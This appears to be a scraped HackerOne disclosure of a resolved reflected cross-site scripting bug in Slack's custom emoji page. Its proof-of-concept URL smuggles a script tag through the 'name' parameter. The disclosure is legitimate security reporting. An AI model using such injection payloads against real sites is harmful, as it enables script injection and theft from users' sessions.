The Custom Emoji Page has a Reflected XSS

Disclosed: 2017-09-24 06:40:12 By co3k To slack

High

Vulnerability Details

The Custom Emoji Page has a Reflected XSS in building flash message. The following is the PoC. https://{team}.slack.com/customize/emoji?added=1&name=vuln"><script>alert(0);<%2Fscript>

Actions

View on HackerOne

Report Stats

Report ID: 258198
State: Closed
Substate: resolved
Upvotes: 55

The Custom Emoji Page has a Reflected XSS

Vulnerability Details

Actions

Report Stats

Share this report